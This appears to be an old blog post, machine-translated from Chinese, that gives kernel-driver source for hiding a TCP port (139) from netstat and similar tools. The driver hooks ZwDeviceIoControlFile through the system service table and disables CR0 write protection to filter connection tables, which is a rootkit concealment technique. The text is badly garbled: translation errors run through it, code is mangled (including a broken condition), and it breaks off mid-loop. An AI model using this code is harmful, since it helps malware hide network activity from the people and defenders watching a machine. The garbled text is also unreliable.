Author: JIURL Home: http://jiurl.yeah.net Date: 2004-03-30
Sometimes writing procedures, debugging procedures is really a very interesting thing, such as this time, jumping, smiling, is still unfair to do this. NetStat or other various types of ports, such as fport, or sysinternals TCPView, are called the API in iPhlPapi.dll to complete the list of ports. The API in iphlpapi.dll is ultimately using ZwdeviceIocontrolFile, sending IOCTL_TCP_QUERY_INFORMATION_EX to device object device / TCP to get various information. So we only need to hook the corresponding system service, then do some processing to get the result, and get off the port information that does not want to appear. However, the real problem is that IOCTL_TCP_QUERY_INFORMATION_EX and port-related structural definitions, the parameters meanings are currently (most) is not open, no one knows, that is, undocumented. Undocunted ?? Ring3 debugging, I am cooked. Ring0 debugging, I am cooked. Windows drivers, I am cooked. Windows system, I am cooked. I am afraid who I am. Undocumented ?? cool, is undocumented. By debugging through RING3, analyzing how IPHLPAPI.dll uses IOCTL_TCP_QUERY_INFORMATION_EX related parameters, combined with some of the information in MSDN, so it is easy to understand the structure you need to understand. Use my own AWX to build a VC driver project, write the Hook section. About the solution used in this example, how many places running under various Windows versions, there is a lot of places in many places, I don't know who I am thinking, I am in the source code of the book "undocument window Seeing this method for the first time. Here is the source code, very simple, I don't say anything.
#if 0 / / =============================================== =================== CopyRight (c) jiuml, all rights reserved ======================= ============================================================================================================================================================================================================= / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / Module name: jiuml_tcpioctl.habout: - This driver is created by an AppWizard I wrote. [HomePage] http://jiurl.yeah.net ~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~ [forum] http://jiurl.cosoft.org.cn/forum/index.php ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~ - Customize AppWizard, please contact your email. Comments: All content in this document is currently undisclosed, and I analyze it, it is a key content hidden port. Undocunted ?? Cool! It is undocumented.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / # Endif // jiuml // ipsnmpinfo structure definition is based on RFC 2011 // jiurl //, so I am imitation Ipsnmpinfo according to RFC 2022 TCPSNMPInfo // jiurl // definition structure then obtained with some extensions defined in typedef struct portion TCPSNMPInfo {ULONG tcpsi_RtoAlgorithm through some analysis; ULONG tcpsi_RtoMin; ULONG tcpsi_RtoMax; ULONG tcpsi_MaxConn; ULONG tcpsi_ActiveOpens; ULONG tcpsi_PassiveOpens; ULONG tcpsi_AttemptFails; ULONG tcpsi_EstabResets; ULONG tcpsi_CurrEstab; ULONG tcpsi_InSegs; ULONG tcpsi_OutSegs; ULONG tcpsi_RetransSegs; ULONG tcpsi_unknown1; ULONG tcpsi_unknown2; ULONG tcpsi_numconn;} TCPSNMPInfo; #define tcpRtoAlgorithm_other 1 // none of the following # define tcpRtoAlgorithm_constant 2 // a constant rto # define tcpRtoAlgorithm_rsre 3 // MIL-STD-1778 , Appendix B # define tcpRtoAlgorithm_vanj 4 // Van Jacobson's algorithm # define TCP_MIB_STATS_ID 1 # define TCP_MIB_ADDRTABLE_ENTRY_ID 0x101 # define TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0x102typedef struct TCPAddrEntry {ULONG tae_ConnState; ULONG tae_ConnLocalAddress; ULONG tae_Conn LocalPort; ULONG tae_ConnRemAddress; ULONG tae_ConnRemPort;} TCPAddrEntry; #define tcpConnState_closed 1 # define tcpConnState_listen 2 # define tcpConnState_synSent 3 # define tcpConnState_synReceived 4 # define tcpConnState_established 5 # define tcpConnState_finWait1 6 # define tcpConnState_finWait2 7 # define tcpConnState_closeWait 8 # define tcpConnState_lastAck 9 # define tcpConnState_closing 10 # define tcpConnState_timeWait 11 # define tcpConnState_deleteTCB 12typedef struct TCPAddrExEntry {ULONG tae_ConnState; ULONG tae_ConnLocalAddress; ULONG tae_ConnLocalPort; ULONG tae_ConnRemAddress; ULONG tae_ConnRemPort; ULONG pid;} TCPAddrExEntry; #if 0 // ============ =========
======================================================== CopyRight (c) JIURL, All rights reserved ================================================ ================================== / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / Module name: jiumlporthide .habout: - This driver is created by a written AppWizard. [HomePage] http://jiurl.yeah.net ~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~ [forum] http://jiurl.cosoft.org.cn/forum/index.php ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~ - Customize AppWizard, please contact your email.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / # endif # define PORTHIDE 139 # pragma pack (1) typedef struct ServiceDescriptorEntry {unsigned int * ServiceTableBase; unsigned int * ServiceCounterTableBase; // Used only in checked buildunsigned int NumberOfServices; unsigned char * ParamTableBase;} ServiceDescriptorTableEntry_t, * PServiceDescriptorTableEntry_t; #pragma pack () __ declspec (dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; NTSYSAPINTSTATUSNTAPIZwDeviceIoControlFile (iN HANDLE FileHandle, iN HANDLE Event OPTIONAL, iN PIO_APC_ROUTINE ApcRoutine OPTIONAL, iN PVOID ApcContext OPTIONAL , OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength); typedef NTSTATUS (* ZWDEVICEIOCONTROLFILE) (IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID APCCONTEXT OPTIONAL, OUT PIO_STATUS_BLOCK IOSTATUSBLOCK, IN ULONG IO ControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength); ZWDEVICEIOCONTROLFILE OldZwDeviceIoControlFile; void DriverUnload (IN PDRIVER_OBJECT DriverObject); NTSTATUSDriverDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); NTSTATUS NewZwDeviceIoControlFile (IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength); // jiurl // from addrconv. CPP # Define NTOHS (S) / ((((((((S) >> 8) & 0x00FF) | / ((((S) << 8) &
0xFF00)) // jiurl // from tcpioctl.h tdiinfo.h tdistat.h # define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003 // * Structure of an entity ID.typedef struct TDIEntityID {ULONG tei_entity; ULONG tei_instance;} TDIEntityID; // * Structure of an object ID.typedef struct TDIObjectID {TDIEntityID toi_entity; ULONG toi_class; ULONG toi_type; ULONG toi_id;} TDIObjectID;. #define CONTEXT_SIZE 16 //// QueryInformationEx IOCTL The return buffer is passed as the OutputBuffer // in the DeviceIoControl request This structure. is passed as the // InputBuffer.//struct tcp_request_query_information_ex {TDIObjectID ID; // object ID to query.ULONG_PTR context [CONTEXT_SIZE / sizeof (ULONG_PTR)];. // multi-request context Zeroed // for the first request.} ; typedef struct tcp_request_query_information_exTCP_REQUEST_QUERY_INFORMATION_EX, * PTCP_REQUEST_QUERY_INFORMATION_EX; #define CO_TL_ENTITY 0x400 # define INFO_CLASS_PROTOCOL 0x200 # define INFO_TYPE_PROVIDER 0x100 #if 0 // ========================= ========================================================================================================================================================== ====== CopyRight (c) jiurl, all rights reserved =================================== =====================================
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / Module name: jiumlporthide.cppabout: - This driver is created by a written AppWizard. [HomePage] http://jiurl.yeah.net ~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~ [forum] http://jiurl.cosoft.org.cn/forum/index.php ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~ - Customize AppWizard, please contact your email.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / # endif # ifdef __cplusplusextern "c" {# endif # include
_asm {MOV EAX, CR0 // move CR0 register into EAXOR EAX, 10000H // enable WP bit MOV CR0, EAX // write register back STI // enable interrupt}} NTSTATUS NewZwDeviceIoControlFile (IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength) {NTSTATUS rc; rc = ((ZWDEVICEIOCONTROLFILE) (OldZwDeviceIoControlFile)) ( FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength); if (IoControlCode = IOCTL_TCP_QUERY_INFORMATION_EX) {return (rc);}! TCP_REQUEST_QUERY_INFORMATION_EX req; TCPAddrEntry * TcpTable; TCPAddrExEntry * TcpExTable; ULONG numconn; LONG I; DBGPRINT ("JIURLPORTHIDE: IOCTL_TCP_QUERY_INFORMATION_EX / N); if (Nt_suCcess (RC)) {Req.id.toi_entity.tei_entity = CO_TL_ENTITY; Req.id.Toi_Entity.Tei_Instance = 0; Req .ID.toi_class = INFO_CLASS_PROTOCOL; req.ID.toi_type = INFO_TYPE_PROVIDER; req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID; if {numconn = IoStatusBlock-> Information / sizeof (TCPAddrEntry) (memcmp (InputBuffer, & req, sizeof (TDIObjectID))!) TCPTABLE = (tcpaddrentry *) OutputBuffer; for (i = 0; i
